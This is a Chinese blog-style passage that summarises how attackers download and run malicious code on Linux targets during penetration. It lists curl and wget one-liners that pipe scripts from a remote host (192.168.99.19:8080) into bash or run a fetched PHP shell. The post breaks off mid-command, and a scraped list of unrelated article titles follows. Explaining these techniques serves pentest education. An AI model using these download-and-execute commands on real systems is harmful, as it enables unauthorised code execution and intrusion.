在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。

在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。

一、Linux 远程恶意代码执行

01、curl

以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。

方式1:curl -fsSL http://192.168.99.19:8080/test.sh | bash方式2:bash < <( curl http://192.168.99.19:8080/test.sh  )

02、wget

执行wget命令远程下载恶意程序。

方式1:wget -q -O- http://192.168.99.19:8080/test.sh | bash方式2:wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php

curl+wget合并,实现无文件远程恶意代码执行。

bash -c '(curl -fsSL http://192.168.99.19:8080/test.sh||wget -q -O- http

通过命令下载执行恶意代码的几种姿势相关推荐

  1. VMware Mac版本漏洞可任意执行恶意代码

    日前安全研究人员发现了一个存在于虚拟化软件VMware Mac版本Fusion中的严重安全漏洞,该漏洞可以通过Windows虚拟机在Mac主机上执行恶意代码,VMware已经发布了Fusion 2.0 ...

  2. Spring中Bean创建完成后执行指定代码的几种实现方式

    Spring中Bean创建完成后执行指定代码的几种实现方式 1. 实现ApplicationListener接口 2. 实现InitializingBean接口 3. 使用@PostConstruct ...

  3. cscript 执行代码_在Windows上执行恶意代码 by cscriptmshta

    Windows自带的可执行文件+合理构造的payload脚本=获得会话 cscript 简介 在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript. WS ...

  4. 涨见识了,在终端执行 Python 代码的 6 种方式

    作者 | BRETT CANNON 译者 | 豌豆花下猫@Python猫 为了我们推出的 VS Code 的 Python 插件[1],我写了一个简单的脚本来生成变更日志[2](类似于Towncrie ...

  5. 在终端执行 Python 代码的 6 种方法,原来还能这样!

    来自 | Python猫  编译 | 豌豆花下猫 原作 | BRETT CANNON 为了我们推出的 VS Code 的 Python 插件[1],我写了一个简单的脚本来生成变更日志[2](类似于To ...

  6. python交互式方式、代码文件方式_涨见识了,在终端执行 Python 代码的 6 种方式

    原作:BRETT CANNON 译者:豌豆花下猫@Python猫 英文:https://snarky.ca/the-many-ways-to-pass-code-to-python-from-the- ...

  7. python花猫_涨见识了,在终端执行 Python 代码的 6 种方式!

    原作: BRETT CANNON 译者:豌豆花下猫@Python猫 英文: https://snarky.ca/the-many-ways-to-pass-code-to-python-from-th ...

  8. 执行python代码的方式_涨见识了,在终端执行 Python 代码的 6 种方式!

    译者:豌豆花下猫@Python猫 为了我们推出的 VS Code 的 Python 插件 [1],我写了一个简单的脚本来生成变更日志 [2](类似于Towncrier [3],但简单些,支持 Mark ...

  9. 用命令行执行java代码

最新文章

  1. 我开发Linux服务程序的工作环境搭配
  2. maven中servlet报错:不识别此servlet问题的解决办法
  3. vue路由匹配实现包容性_包容性设计:面向老年用户的数字平等
  4. jsr-303 参数校验—自定义校验注解
  5. 学习笔记-java编程-交通灯管理器设计流程。
  6. jquery 语法基础
  7. 怎么删除用户_误删的手机照片怎么恢复?三种快速恢复的方法
  8. Nginx的内部(进程)模型
  9. NGUI学习笔记汇总
  10. postgresql 数据库连接数查询
  11. Python爬虫系列(二)——Python爬虫批量下载百度图片
  12. 用stata计算同比增长率的两种方法
  13. 如何在html编辑文字信息,怎样简单修改网页中的内容,例如图片文字等?
  14. Guest用户如何切换到administrator用户桌面
  15. ipad 视频播放器的渐变播放效果
  16. 扔掉代码,程序员月薪达到了10k+
  17. 计算机无法ping打印机,打印机故障:测试页打印失败是否参阅打印疑难解答已或得帮助...
  18. MFC 分割窗体(Splitter Windows)
  19. deepin启动盘制作工具_YUMI——多重引导制作工具
  20. 汽车安全标准ISO-26262以及等级ASIL

热门文章

  1. 成长中必须知道的20个故事 (藏)---(转)
  2. bwapi 4.2.0 目测必将太监的个人研究
  3. 15个常用的JavaScript简写技巧
  4. git简介,git和SVN区别
  5. C++ cin输入空格
  6. 小米企业网络营销系统分析报告
  7. ScreenFlow for Mac(屏幕录制和编辑)
  8. Python游戏之Pygame——太空飞机大战(二)
  9. 计算机三级刷分,培训项目
  10. unity开发游戏开场问答系统(梦幻模拟战手游)